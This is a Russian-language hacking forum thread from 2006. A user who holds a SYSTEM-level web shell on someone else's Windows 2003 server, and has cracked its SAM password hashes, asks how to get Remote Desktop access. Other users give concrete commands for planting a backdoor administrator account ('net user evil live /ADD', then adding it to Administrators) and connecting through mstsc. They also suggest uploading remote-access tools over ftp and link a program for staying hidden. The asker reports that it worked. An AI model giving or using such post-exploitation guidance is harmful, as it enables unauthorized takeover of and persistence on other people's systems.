PDA

Просмотр полной версии : Удаленный рабочий стол


Dima-k17
25.04.2006, 23:32
Всем привет! Вопрос, есть удаленная машина, на ней web-shell. Включен "Удаленный рабочий стол", насколько я знаю, логин и пасс такие же, как и на вход в систему, но они не подходят. Скачал sam файл из repair, расшифровал, не подходит ничего(((
Вопрос, как имея web-shell с правами system дописать пользователя на Удаленный рабочий стол?
Система: Win2003Server Enterprise Edition

Dronga
26.04.2006, 00:03
Попробуй на своей машине Пуск -> Выполнить -> mstsc /?

Дальше увидишь... Попробуй по поисковикам поглядеть что за RDP файлы подключения.

Если пароли для удаленного рабочего стола совпадают с паролями пользователей, то брать SAM из каталога REPAIR было нелогичным, возможно расшифровал не правильно. Куда проще добавить своего пользователя командой net user /add. Или как альтернативу можно использовать команду ftp и закачать что-нибудь с функциями аналогичными удаленному рабочему столу.

Deem3n®
26.04.2006, 10:09
Ну если у тебя права SYSTEM то сделай следующее:
1) проверь если запущен сервер терминалов (то что включен "удаленный рабочий стол" еще не значит что к машине можно подключатся удаленно):
C:\Documents and Settings\god>qwinsta /server:127.0.0.1
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console Administrator 0 Active wdcon
rdp-tcp 65536 Listen rdpwd
как ... дописать пользователя на Удаленный рабочий стол?
2) Добавь пользователя:
net user evil live /ADD(live это пароль ;) )
3) Добавь нового пользователя в группу администраторов: net localgroup Administrators evil /ADDТеперь подключайся этим пользователем
mstsc -v:x.x.x.x /fx.x.x.x - ип серва. Теперь можно добавить любого существующего в системе пользователя в группу Remote Desktop Users (как это сделать описано тут (http://technet2.microsoft.com/WindowsServer/en/Library/73de2d7f-3cc3-4afb-88a2-dd0698c5d5091033.mspx)).

Brun
26.04.2006, 11:37
+ что бы невидно было можно мою прогу заюзать
http://forum.antichat.ru/thread17954.html
Похвалился. :-)

Dima-k17
26.04.2006, 20:00
=) Всем спасибо за ответы, счас пойду пробовать...
По непонятным причинам не могу запускать приложения при помощи web-shell'a. Он долго думает, а потом выдает ошибку(404) и никакого ответа, использовал r57shell и самописный.
Параллельно вопросы:
1) Почему было нелогичным брать пассы из repair?
2) net localgroup Administrators evil /ADD

Теперь подключайся этим пользователем
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу? По умолчанию только пользователь "Администратор" имеет доступ, но никак не группа "Администраторы"
P.S> У мну просто *nix, поэтому тяжело как-то=)

Brun
26.04.2006, 21:49
Почему было нелогичным брать пассы из repair?
Потому что там может и не быть хеша, а если и повезёт, то может быть сложный пароль (хрен подберёш).
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу Читай Большой ФАКю по РАдмину (тут же).

Dima-k17
26.04.2006, 22:07
Потому что там может и не быть хеша, а если и повезёт, то может быть сложный пароль (хрен подберёш).
Читай Большой ФАКю по РАдмину (тут же).
1)Ясно, вообщем пасс я подобрал, он оказался такойже как и логин, но коннекта нету(((
2) Не в том дело, разговор идет не о РАдмине, а об Удаленном рабочем столе, о том, что заново созданный пользователь не имеет прав для подключения к УРС(Удаленный рабочий стол).

Deem3n®
27.04.2006, 09:21
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу? По умолчанию только пользователь "Администратор" имеет доступ, но никак не группа "Администраторы"

Можно 100%, проверял локально. Если запущен сервер терминалов то пользователям группы "Администраторы" ("Administrators") разрешено подключатся удаленно.

Brun
27.04.2006, 18:33
Dima-k17 для тебя написал

http://forum.antichat.ru/threadedpost144129.html#post144129

Dima-k17
27.04.2006, 19:35
мммм.... всем спасибо, заработало;)